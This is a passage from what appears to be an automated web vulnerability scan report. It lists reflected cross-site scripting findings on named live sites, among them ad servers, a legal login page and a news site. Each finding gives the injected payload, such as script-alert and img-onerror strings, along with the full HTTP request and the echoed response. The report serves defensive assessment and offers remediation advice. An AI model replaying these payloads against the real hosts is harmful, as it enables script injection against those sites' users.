Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:02:34 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=0x0abf19'-alert(1)-'e26e9738d4e&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdU
...[SNIP]...

4.87. http://adserving.cpxinteractive.com/st [pop_frequency parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_frequency request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2af3e'-alert(1)-'acaaadb8c74 was submitted in the pop_frequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=02af3e'-alert(1)-'acaaadb8c74&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:12 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=02af3e'-alert(1)-'acaaadb8c74&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kG
...[SNIP]...

4.88. http://adserving.cpxinteractive.com/st [pop_times parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_times request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 415c8'-alert(1)-'0163bb86c01 was submitted in the pop_times parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1415c8'-alert(1)-'0163bb86c01&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:04 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1415c8'-alert(1)-'0163bb86c01&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pR
...[SNIP]...

4.89. http://adserving.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ae4f'-alert(1)-'10d8742ce91 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=17487132ae4f'-alert(1)-'10d8742ce91&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:02:42 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=17487132ae4f'-alert(1)-'10d8742ce91&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4Ux
...[SNIP]...

4.90. https://ams-legal.net/support/Login.asp [userid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /support/Login.asp

Issue detail

The value of the userid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e187d"><script>alert(1)</script>9ba0e3ea2194d98f4 was submitted in the userid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /support/Login.asp?newPassword=1&userid=e187d"><script>alert(1)</script>9ba0e3ea2194d98f4&password= HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK; ASPSESSIONIDQSCDBTRB=HJGHIDNBKFGLLIOHFCIEAMGP

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:33:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 3024
Content-Type: text/html
Expires: Thu, 12 May 2011 12:33:05 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...
<input id="userid" name="userid" type="text" value="e187d"><script>alert(1)</script>9ba0e3ea2194d98f4" onFocus="window.status='Required field. Please enter your user ID';" />
...[SNIP]...

4.91. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31754<img%20src%3da%20onerror%3dalert(1)>d4c46211706 was submitted in the REST URL parameter 3. This input was echoed as 31754<img src=a onerror=alert(1)>d4c46211706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgi-bin/AppLoader/AENDU0IN29GG31754<img%20src%3da%20onerror%3dalert(1)>d4c46211706/5000//20110401-102631?cc=0.7025338695384562&modified=20110401-102631 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FE10F04CB4E1537E78031D282002DCB7.3DF39F9B; rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:49 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript
Content-Length: 3527
P3P: CP="NOI COR CURa INT"

// ----------------------------------------------------------------------------
if (typeof(ACCESSIBLE_VERSION) == "undefined") { ACCESSIBLE_VERSION = false; }
// --------------------------------------
...[SNIP]...
</SCRIPT>");


}({
accountId : "AENDU0IN29GG31754<img src=a onerror=alert(1)>d4c46211706",
internalId : "",
customField : "20110401-102631",
server : "cgiwsc.enhancedsitebuilder.com:80",
cgiPath : "/cgi-bin/Footer",
cgiRes :
...[SNIP]...

4.92. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 472fe<img%20src%3da%20onerror%3dalert(1)>4d759b0f60a was submitted in the REST URL parameter 5. This input was echoed as 472fe<img src=a onerror=alert(1)>4d759b0f60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631472fe<img%20src%3da%20onerror%3dalert(1)>4d759b0f60a?cc=0.7025338695384562&modified=20110401-102631 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FE10F04CB4E1537E78031D282002DCB7.3DF39F9B; rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:11 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript
Content-Length: 3551
P3P: CP="NOI COR CURa INT"

// ----------------------------------------------------------------------------
if (typeof(ACCESSIBLE_VERSION) == "undefined") { ACCESSIBLE_VERSION = false; }
// --------------------------------------
...[SNIP]...
</SCRIPT>");


}({
accountId : "AENDU0IN29GG",
internalId : "",
customField : "20110401-102631472fe<img src=a onerror=alert(1)>4d759b0f60a",
server : "cgiwsc.enhancedsitebuilder.com:80",
cgiPath : "/cgi-bin/Footer",
cgiRes : "http://cgiwsc.enhancedsitebuilder.com:80/cgi",
productId
...[SNIP]...

4.93. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbb84<img%20src%3da%20onerror%3dalert(1)>c65bf2df732 was submitted in the REST URL parameter 3. This input was echoed as dbb84<img src=a onerror=alert(1)>c65bf2df732 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GGdbb84<img%20src%3da%20onerror%3dalert(1)>c65bf2df732/7008/16420/language%3Aen%3Bcountry%3AUS%3B?cc=0.6917730856221169 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/26401.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:08:10 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 82

// noop: d: [AENDU0IN29GGdbb84<img src=a onerror=alert(1)>c65bf2df732,7008,16420]

4.94. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 380e8<img%20src%3da%20onerror%3dalert(1)>95c2f9acef8 was submitted in the REST URL parameter 4. This input was echoed as 380e8<img src=a onerror=alert(1)>95c2f9acef8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GG/7008380e8<img%20src%3da%20onerror%3dalert(1)>95c2f9acef8/16420/language%3Aen%3Bcountry%3AUS%3B?cc=0.6917730856221169 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/26401.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:08:24 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 58

// noop: 7008380e8<img src=a onerror=alert(1)>95c2f9acef8

4.95. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ceec1<img%20src%3da%20onerror%3dalert(1)>73991205269 was submitted in the REST URL parameter 3. This input was echoed as ceec1<img src=a onerror=alert(1)>73991205269 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GGceec1<img%20src%3da%20onerror%3dalert(1)>73991205269/7008/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:16 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 82

// noop: d: [AENDU0IN29GGceec1<img src=a onerror=alert(1)>73991205269,7008,25529]

4.96. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a202b<img%20src%3da%20onerror%3dalert(1)>38bb7ff743d was submitted in the REST URL parameter 4. This input was echoed as a202b<img src=a onerror=alert(1)>38bb7ff743d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GG/7008a202b<img%20src%3da%20onerror%3dalert(1)>38bb7ff743d/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:29 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 58

// noop: 7008a202b<img src=a onerror=alert(1)>38bb7ff743d

4.97. http://da.newstogram.com/hg.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 19af2<script>alert(1)</script>e16d4149e4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed19af2<script>alert(1)</script>e16d4149e4 HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:41 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:41 GMT; domain=.newstogram.com
Content-Length: 162

Newstogram.completed19af2<script>alert(1)</script>e16d4149e4({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

4.98. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7111<script>alert(1)</script>14f91b7e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.compl/d7111<script>alert(1)</script>14f91b7e83eted HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:47 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:47 GMT; domain=.newstogram.com
Content-Length: 163

Newstogram.compl/d7111<script>alert(1)</script>14f91b7e83eted({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

4.99. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/mergers-acquisitions/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f31"><script>alert(1)</script>d4e86dd7255 was submitted in the REST URL parameter 2. This input was echoed as e7f31\"><script>alert(1)</script>d4e86dd7255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topicse7f31"><script>alert(1)</script>d4e86dd7255/mergers-acquisitions/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
